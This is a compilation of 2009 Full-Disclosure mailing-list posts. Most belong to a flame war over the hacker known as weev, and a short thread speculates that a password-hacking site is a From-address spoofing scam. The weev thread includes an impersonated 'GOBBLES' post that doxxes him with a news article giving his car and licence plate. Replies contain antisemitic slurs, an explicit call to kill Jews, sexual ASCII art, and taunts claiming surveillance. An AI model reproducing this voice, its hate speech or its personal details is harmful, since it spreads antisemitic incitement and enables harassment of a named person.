http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti me.php. Archival: http://www.webcitation.org/5jnPc0pNy I suppose crime doesn't pay. If you've had any issues with weev / Andrew Aurenheimer, feel free to send in
Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
lol buddy i put my name in my own fuckin' blog its not like youve discovered some big secret also, i lol that it took the worlds most well funded law enforcement agency working at the behest of the one true arm of satan just to dox me. you dudes are sad. lets smoke crack and kill jews. On Mon, Sep 14, 2009 at 9:26 PM, GOBBLES j...@mac.hush.com wrote: ___ ___ _ | __ | | |__] |__] ||___ [__ |__] |__| |__] |__] |___ |___ ___] _ _ ___ _ ___ _ |__| |\ | | \ | | \ | | | | \| |__/_| |__/ |___ Presents = Meet the exposed Andrew Aurenheimer. Also known as weev, weevlar, weevlos, wbeelsoi. Former bantown member and a sysop at encyclopediadramatica. He is a failed man. Loyalty to him shall bring you no benefit. See for yourself: Law enforcement authorities reportedly have identified a 21-year- old Vancouver man as the individual who made two threatening telephone calls to Congregation Beth Israel on the night of June 16. Jewish Federation of Greater Portland Community Relations Director Robert Horenstein said the suspect, whose name was not made public, “admitted making the calls and the FBI is now working with the U.S. Attorney’s office to determine if a crime has been committed.” The alleged caller, whom authorities described to Horenstein as having “low intelligence and no means to carry out any threats,” reportedly said over the phone, “The Nazis are coming to get you; there will be another Holocaust” and “You killed my Lord. You will pay.” The calls were left on the CBI’s voice mail system and were first heard the next morning by Rabbi Michael Cahana. Cahana said, “I was very, very pleased at the responsiveness of the Portland Police and FBI. They gave us a strong sense that they were taking this seriously and we were in very good hands.” The rabbi declined to elaborate on the incident. Portland FBI spokeswoman Beth Anne Steele said her office could not comment on an ongoing investigation but that the FBI was “working closely with the folks at the temple as well as the Portland Police Bureau.” Prior to police identification of the Vancouver man, Horenstein said in an e-mail alert that law enforcement officials had speculated the caller may have been a 24-year-old Los Angeles man who operates the Web site theiprophet.blip.tv/ (since taken offline) on which Jews have been vilified. Horenstein identified that man as Andrew Auernheimer. In a video that was on Auernheimer’s Web site he said, “I’ve got to skip town. There are some big Jews that want to hand me a summons. …On the 16th (of June) I am taking a pilgrimage northward to Portland.” Auernheimer was detained and questioned by members of the FBI and the Portland Police Bureau, first in Grants Pass and later in Wilsonville, according to Horenstein. Horenstein said, “Portland police now believe him to be a much lower-level threat than was believed previously, but stress that they will continue to monitor him.” Auernheimer reportedly was warned not to go near any Jewish congregation or agency. Horenstein said he was told that Auernheimer had no plans to do so and that he claimed “he has no violent intentions.” Horenstein said Auernheimer drives a 2000 silver Honda Civic with California license plate 6EFJ814 and was traveling with a Native American woman. He said that if Auernheimer is seen near any Jewish facility, authorities should be notified immediately by calling 911. Horenstein expressed gratitude for the work of the law enforcement personnel: “We should all be deeply grateful to the FBI and Portland police, especially officers Brian Hughes and Tony Cavalli, for their commitment to keeping us all safe.” Hughes referred inquiries to PPB spokeswoman Det. Mary Weed who did not return telephone calls before the Jewish Review’s press time. Source: http://www.jewishreview.org/local/Police-question-two-men- about-threats-to-Jewish-communityhttp://www.jewishreview.org/local/Police-question-two-men-%0Aabout-threats-to-Jewish-community Archival: http://www.webcitation.org/5jnPBPyHG Weev's response: look at these fucking kikes how they fucking don't name the person who made the threats, but name me instead. it looks like i was responsible for it unless you read the article real hard. i've been informed that the person who called in the synagogue threats was someone being blackmailed by a rabbi, and that he was assured immunity. this was a setup from the beginning to get me on the counterterrorism map so they could have my assets stolen and me criminally harassed. seriously, there has to be something fucking libelous in the fact that i am the sole person named in this article when i had absolutely no involvement in it, and was not charged with any crime. there is no fucking freedom of speech left in this country. if saying anything the establishment doesn't like results in attacks on someone's
Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
Herr Evron, Ms. Alder, and Dr. Krawetz: While your valiant effort at cyberimpersonation is quite laudable, it should be noted that mastery of ASCII graphics beyond the level of the System V banner command is one (admittedly, non-lexicographically fingerprintable) integral hallmark of the departed and now-presumably-disbanded security lulz-mill you've attempted to mimic, a critical ridge of the digital epidermis that your missive fails to capture. Indeed, at a minimum, a handful of opportunistically-placed simple imagus penii , as below, would have yielded this post some authenticity, e.g.: 8===D ) (uncircumcised) 8=D~~~ (ejaculate included) ___ // 7 (_,_/\ \\ \\ _\\__ ( \ ) \___\___/ (overly-detailed and unrenderable depending on native character set) ... Ad infinitum. That said, your attempted Internet volleys have touched on a key conundrum that has puzzled this mustache for some time wrt. the varied and sundry security-centric cyber-Vasićka of the first decade of this millenium's latter half. Typically, this mustache has found anti-semitism and racism to have ironclad utility as field tests for limited reasoning capabilities and / or sub-80 Terman-Binet scores within the boundaries of mental retardation as proscribed by the DSM-IV. And yet... The alleged Mr. Aurenheimer and his [redacted] cohorts are demonstrably quite bright! The resulting dichotomy has been rather troublesome to this mustache, and has kept me awake, oft in spirited debate with my left and right Sideburnian peers, on many a balmy autumn evening such as the one now upon us. At precisely this second (and admittedly bound to revision from moment to passing moment), I can only conclude that Monsignor Weev is often indeed doing that which he is best regarded for -- provoking a visceral and disproportionate reaction in those too cynical to see said intent -- when he espouses deepy held beliefs in such laughable notions of race, a vein he has (or so it would seem) mined with much success for many years. I can only presume that (to use the parlance of the fora the young man in question is known to frequent) this would indeed make you that which is typically described as a lolcow. In keeping with the vernacular of the Now, I include this informational graphic: (__) (..) /---\/ / || || ||-|| *^^^ Apropos on numerous levels, the asterix on the far left quadrant does indeed denote bullshit. Your Humble Servant, Вусы Валдзіс On 9/14/09, GOBBLES j...@mac.hush.com wrote: ___ ___ _ | __ | | |__] |__] ||___ [__ |__] |__| |__] |__] |___ |___ ___] _ _ ___ _ ___ _ |__| |\ | | \ | | \ | | | | \| |__/_| |__/ |___ Presents = Meet the exposed Andrew Aurenheimer. Also known as weev, weevlar, weevlos, wbeelsoi. Former bantown member and a sysop at encyclopediadramatica. He is a failed man. Loyalty to him shall bring you no benefit. See for yourself: Law enforcement authorities reportedly have identified a 21-year- old Vancouver man as the individual who made two threatening telephone calls to Congregation Beth Israel on the night of June 16. Jewish Federation of Greater Portland Community Relations Director Robert Horenstein said the suspect, whose name was not made public, “admitted making the calls and the FBI is now working with the U.S. Attorney’s office to determine if a crime has been committed.” The alleged caller, whom authorities described to Horenstein as having “low intelligence and no means to carry out any threats,” reportedly said over the phone, “The Nazis are coming to get you; there will be another Holocaust” and “You killed my Lord. You will pay.” The calls were left on the CBI’s voice mail system and were first heard the next morning by Rabbi Michael Cahana. Cahana said, “I was very, very pleased at the responsiveness of the Portland Police and FBI. They gave us a strong sense that they were taking this seriously and we were in very good hands.” The rabbi declined to elaborate on the incident. Portland FBI spokeswoman Beth Anne Steele said her office could not comment on an ongoing investigation but that the FBI was “working closely with the folks at the temple as well as the Portland Police Bureau.” Prior to police identification of the Vancouver man, Horenstein said in an e-mail alert that law enforcement officials had speculated the caller may have been a 24-year-old Los Angeles man who operates the Web site theiprophet.blip.tv/ (since taken offline) on which Jews have been vilified. Horenstein identified that man as Andrew Auernheimer. In a video that was on Auernheimer’s Web site he said, “I’ve got to skip town. There are some big Jews that want to hand me a summons. …On the 16th (of June) I am taking a pilgrimage northward to Portland.” Auernheimer was detained and
Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
*grins like chesire cat* *spins you around* Oh weev, you try too hard. You hold on to vanity like a 13 year old girl. That's what your friends say. Or at least people who think are your friend. I've been in contact with hep, sherrod degrippo, oclet and tehdely about what a flatout nutter you are. And btw, last I heard your vehicles bugged for sound and GPS. Those dudes handed over your logs. You got a mountain of people ready to testify against you. Most will play buddy with you until you get the iron cuffs slapped on. They gone el mariachi on you bud. You think you can make a living off ads and selling t-shirts? Use your fucking brain. Idiot. You know your worlds spinning before you why don't you just give up. Enjoy ^_^ Presents = Sorry about that. The JDL/GOBBLES team takes mispellings very seriously. Meet the exposed Andrew Auernheimer. Former bantown member and a sysop at encyclopediadramatica. Aliases: - weev - weevlar - weevlos - the iprophet - wbeelsoi He is a failed man. Loyalty to him shall bring you no benefit. See for yourself: Law enforcement authorities reportedly have identified a 21-year- old Vancouver man as the individual who made two threatening telephone calls to Congregation Beth Israel on the night of June 16. Jewish Federation of Greater Portland Community Relations Director Robert Horenstein said the suspect, whose name was not made public, “admitted making the calls and the FBI is now working with the U.S. Attorney’s office to determine if a crime has been committed.” The alleged caller, whom authorities described to Horenstein as having “low intelligence and no means to carry out any threats,” reportedly said over the phone, “The Nazis are coming to get you; there will be another Holocaust” and “You killed my Lord. You will pay.” The calls were left on the CBI’s voice mail system and were first heard the next morning by Rabbi Michael Cahana. Cahana said, “I was very, very pleased at the responsiveness of the Portland Police and FBI. They gave us a strong sense that they were taking this seriously and we were in very good hands.” The rabbi declined to elaborate on the incident. Portland FBI spokeswoman Beth Anne Steele said her office could not comment on an ongoing investigation but that the FBI was “working closely with the folks at the temple as well as the Portland Police Bureau.” Prior to police identification of the Vancouver man, Horenstein said in an e-mail alert that law enforcement officials had speculated the caller may have been a 24-year-old Los Angeles man who operates the Web site theiprophet.blip.tv/ (since taken offline) on which Jews have been vilified. Horenstein identified that man as Andrew Auernheimer. In a video that was on Auernheimer’s Web site he said, “I’ve got to skip town. There are some big Jews that want to hand me a summons. …On the 16th (of June) I am taking a pilgrimage northward to Portland.” Auernheimer was detained and questioned by members of the FBI and the Portland Police Bureau, first in Grants Pass and later in Wilsonville, according to Horenstein. Horenstein said, “Portland police now believe him to be a much lower-level threat than was believed previously, but stress that they will continue to monitor him.” Auernheimer reportedly was warned not to go near any Jewish congregation or agency. Horenstein said he was told that Auernheimer had no plans to do so and that he claimed “he has no violent intentions.” Horenstein said Auernheimer drives a 2000 silver Honda Civic with California license plate 6EFJ814 and was traveling with a Native American woman. He said that if Auernheimer is seen near any Jewish facility, authorities should be notified immediately by calling 911. Horenstein expressed gratitude for the work of the law enforcement personnel: “We should all be deeply grateful to the FBI and Portland police, especially officers Brian Hughes and Tony Cavalli, for their commitment to keeping us all safe.” Hughes referred inquiries to PPB spokeswoman Det. Mary Weed who did not return telephone calls before the Jewish Review’s press time. Source: http://www.jewishreview.org/local/Police-question-two-men- about-threats-to-Jewish-community Archival: http://www.webcitation.org/5jnPBPyHG Weev's response: look at these fucking kikes how they fucking don't name the person who made the threats, but name me instead. it looks like i was responsible for it unless you read the article real hard. i've been informed that the person who called in the synagogue threats was someone being blackmailed by a rabbi, and that he was assured immunity. this was a setup from the beginning to get me on the counterterrorism map so they could have my assets stolen and me criminally harassed. seriously, there has to be something fucking libelous in the fact that i am the sole person named in this article when i had absolutely no involvement in it, and was not charged with any crime. there is no fucking freedom of speech
Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
..
_ .' `.
/\)
/ /
/ / /\
\ \ / \
_ \ \/ /\ \
(/\ \ / \ \
\ \ / \ (Y )
\ \/ /\ \
\ / \ \
\/ / /
/ /
( Y)
GADI EVRON GONNA CALL THE JIZZTAPO ON ME
On Mon, Sep 14, 2009 at 11:37 PM, Valdis' Mustache
securitas.must...@gmail.com wrote:
Herr Evron, Ms. Alder, and Dr. Krawetz:
While your valiant effort at cyberimpersonation is quite laudable, it
should be noted that mastery of ASCII graphics beyond the level of the
System V banner command is one (admittedly, non-lexicographically
fingerprintable) integral hallmark of the departed and
now-presumably-disbanded security lulz-mill you've attempted to
mimic, a critical ridge of the digital epidermis that your missive
fails to capture.
Indeed, at a minimum, a handful of opportunistically-placed simple
imagus penii , as below, would have yielded this post some
authenticity, e.g.:
8===D
) (uncircumcised)
8=D~~~ (ejaculate included)
___
// 7
(_,_/\
\\
\\
_\\__
( \ )
\___\___/
(overly-detailed and unrenderable depending on native character set)
... Ad infinitum.
That said, your attempted Internet volleys have touched on a key
conundrum that has puzzled this mustache for some time wrt. the varied
and sundry security-centric cyber-Vasićka of the first decade of this
millenium's latter half.
Typically, this mustache has found anti-semitism and racism to have
ironclad utility as field tests for limited reasoning capabilities and
/ or sub-80 Terman-Binet scores within the boundaries of mental
retardation as proscribed by the DSM-IV.
And yet... The alleged Mr. Aurenheimer and his [redacted] cohorts are
demonstrably quite bright!
The resulting dichotomy has been rather troublesome to this mustache,
and has kept me awake, oft in spirited debate with my left and right
Sideburnian peers, on many a balmy autumn evening such as the one now
upon us.
At precisely this second (and admittedly bound to revision from moment
to passing moment), I can only conclude that Monsignor Weev is often
indeed doing that which he is best regarded for -- provoking a
visceral and disproportionate reaction in those too cynical to see
said intent -- when he espouses deepy held beliefs in such laughable
notions of race, a vein he has (or so it would seem) mined with much
success for many years.
I can only presume that (to use the parlance of the fora the young man
in question is known to frequent) this would indeed make you that
which is typically described as a lolcow.
In keeping with the vernacular of the Now, I include this informational
graphic:
(__)
(..)
/---\/
/ || ||
||-||
*^^^
Apropos on numerous levels, the asterix on the far left quadrant does
indeed denote bullshit.
Your Humble Servant,
Вусы Валдзіс
On 9/14/09, GOBBLES j...@mac.hush.com wrote:
___ ___ _
| __ | | |__] |__] ||___ [__
|__] |__| |__] |__] |___ |___ ___]
_ _ ___ _ ___ _
|__| |\ | | \ | | \ |
| | | \| |__/_| |__/ |___
Presents
=
Meet the exposed Andrew Aurenheimer. Also known as weev,
weevlar,
weevlos, wbeelsoi. Former bantown member and a sysop at
encyclopediadramatica. He is a failed man. Loyalty to him shall
bring
you no benefit. See for yourself:
Law enforcement authorities reportedly have identified a 21-year-
old Vancouver man as the individual who made two threatening
telephone calls to Congregation Beth Israel on the night of June 16.
Jewish Federation of Greater Portland Community Relations Director
Robert Horenstein said the suspect, whose name was not made public,
“admitted making the calls and the FBI is now working with the U.S.
Attorney’s office to determine if a crime has been committed.”
The alleged caller, whom authorities described to Horenstein as
having “low intelligence and no means to carry out any threats,”
reportedly said over the phone, “The Nazis are coming to get you;
there will be another Holocaust” and “You killed my Lord. You will
pay.”
The calls were left on the CBI’s voice mail system and were first
heard the next morning by Rabbi Michael Cahana.
Cahana said, “I was very, very pleased at the responsiveness of the
Portland Police and FBI. They gave us a strong sense that they were
taking this seriously and we were in very good hands.”
The rabbi declined to elaborate on the incident.
Portland FBI spokeswoman Beth Anne Steele said her office could not
comment on an ongoing investigation but that the FBI was “working
closely with the folks at the temple as well as the Portland Police
Bureau.”
Prior to police identification of the Vancouver man, Horenstein
said in an e-mail alert that law enforcement officials had
speculated the caller may
Re: [Full-disclosure] Hack-Mail.net or similar site
I think this service is fake. To make some portal like this only you need a php form with the following fields: Account to Hack, Account to send password Some client fill this form and three days later the server send a spoofed mail acting like they have the password of the account requested in previous form. When the client put his fait in this kind of cheat pay the cash and maybe some kind of trash is sended to his account. When the client in cheated is too late. Now the owners of the site have his 20 buck. I was tested it and the mail doesn't become from yahoo server. The mail become from bebobox.com My english sucks! Sorry On Mon, Sep 14, 2009 at 7:43 PM, maxigas maxi...@anargeek.net wrote: From: mamo mam...@gmail.com Subject: Re: [Full-disclosure] Hack-Mail.net or similar site Date: Mon, 14 Sep 2009 23:20:24 +0200 On Sat, Sep 12, 2009 at 7:08 PM, Andrew Farmer andf...@gmail.com wrote: So, in other words, they're spoofing From addresses for profit. Clever. I never tried them. I will just for fun (with my email address). Perhaps they are doing something more smart (like brute forcing with dictionary, use some virus or web attack or something else). Mamo tell us how it went, my guess was also that they are just setting that from= address and that's it, so you don't get a working password after all. but i have no 20$ to test it. :f maxigas ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
Adrian,
Godwin be damned, I must know! You can't sincerely be a racist or
anti-semite in this day and age, can you? Which is the fool, your
spectators, or you?
My hairs bristle in anticipation at your answer.
Your Humble Servant,
La moustache de Valdis
On 9/14/09, Andrew A glutt...@gmail.com wrote:
..
_ .' `.
/\)
/ /
/ / /\
\ \ / \
_ \ \/ /\ \
(/\ \ / \ \
\ \ / \ (Y )
\ \/ /\ \
\ / \ \
\/ / /
/ /
( Y)
GADI EVRON GONNA CALL THE JIZZTAPO ON ME
On Mon, Sep 14, 2009 at 11:37 PM, Valdis' Mustache
securitas.must...@gmail.com wrote:
Herr Evron, Ms. Alder, and Dr. Krawetz:
While your valiant effort at cyberimpersonation is quite laudable, it
should be noted that mastery of ASCII graphics beyond the level of the
System V banner command is one (admittedly, non-lexicographically
fingerprintable) integral hallmark of the departed and
now-presumably-disbanded security lulz-mill you've attempted to
mimic, a critical ridge of the digital epidermis that your missive
fails to capture.
Indeed, at a minimum, a handful of opportunistically-placed simple
imagus penii , as below, would have yielded this post some
authenticity, e.g.:
8===D
) (uncircumcised)
8=D~~~ (ejaculate included)
___
// 7
(_,_/\
\\
\\
_\\__
( \ )
\___\___/
(overly-detailed and unrenderable depending on native character set)
... Ad infinitum.
That said, your attempted Internet volleys have touched on a key
conundrum that has puzzled this mustache for some time wrt. the varied
and sundry security-centric cyber-Vasićka of the first decade of this
millenium's latter half.
Typically, this mustache has found anti-semitism and racism to have
ironclad utility as field tests for limited reasoning capabilities and
/ or sub-80 Terman-Binet scores within the boundaries of mental
retardation as proscribed by the DSM-IV.
And yet... The alleged Mr. Aurenheimer and his [redacted] cohorts are
demonstrably quite bright!
The resulting dichotomy has been rather troublesome to this mustache,
and has kept me awake, oft in spirited debate with my left and right
Sideburnian peers, on many a balmy autumn evening such as the one now
upon us.
At precisely this second (and admittedly bound to revision from moment
to passing moment), I can only conclude that Monsignor Weev is often
indeed doing that which he is best regarded for -- provoking a
visceral and disproportionate reaction in those too cynical to see
said intent -- when he espouses deepy held beliefs in such laughable
notions of race, a vein he has (or so it would seem) mined with much
success for many years.
I can only presume that (to use the parlance of the fora the young man
in question is known to frequent) this would indeed make you that
which is typically described as a lolcow.
In keeping with the vernacular of the Now, I include this informational
graphic:
(__)
(..)
/---\/
/ || ||
||-||
*^^^
Apropos on numerous levels, the asterix on the far left quadrant does
indeed denote bullshit.
Your Humble Servant,
Вусы Валдзіс
On 9/14/09, GOBBLES j...@mac.hush.com wrote:
___ ___ _
| __ | | |__] |__] ||___ [__
|__] |__| |__] |__] |___ |___ ___]
_ _ ___ _ ___ _
|__| |\ | | \ | | \ |
| | | \| |__/_| |__/ |___
Presents
=
Meet the exposed Andrew Aurenheimer. Also known as weev,
weevlar,
weevlos, wbeelsoi. Former bantown member and a sysop at
encyclopediadramatica. He is a failed man. Loyalty to him shall
bring
you no benefit. See for yourself:
Law enforcement authorities reportedly have identified a 21-year-
old Vancouver man as the individual who made two threatening
telephone calls to Congregation Beth Israel on the night of June 16.
Jewish Federation of Greater Portland Community Relations Director
Robert Horenstein said the suspect, whose name was not made public,
“admitted making the calls and the FBI is now working with the U.S.
Attorney’s office to determine if a crime has been committed.”
The alleged caller, whom authorities described to Horenstein as
having “low intelligence and no means to carry out any threats,”
reportedly said over the phone, “The Nazis are coming to get you;
there will be another Holocaust” and “You killed my Lord. You will
pay.”
The calls were left on the CBI’s voice mail system and were first
heard the next morning by Rabbi Michael Cahana.
Cahana said, “I was very, very pleased at the responsiveness of the
Portland Police and FBI. They gave us a strong sense that they were
taking this seriously and we were in very good hands.”
The rabbi declined to elaborate on the incident.
Portland FBI spokeswoman Beth Anne Steele said her
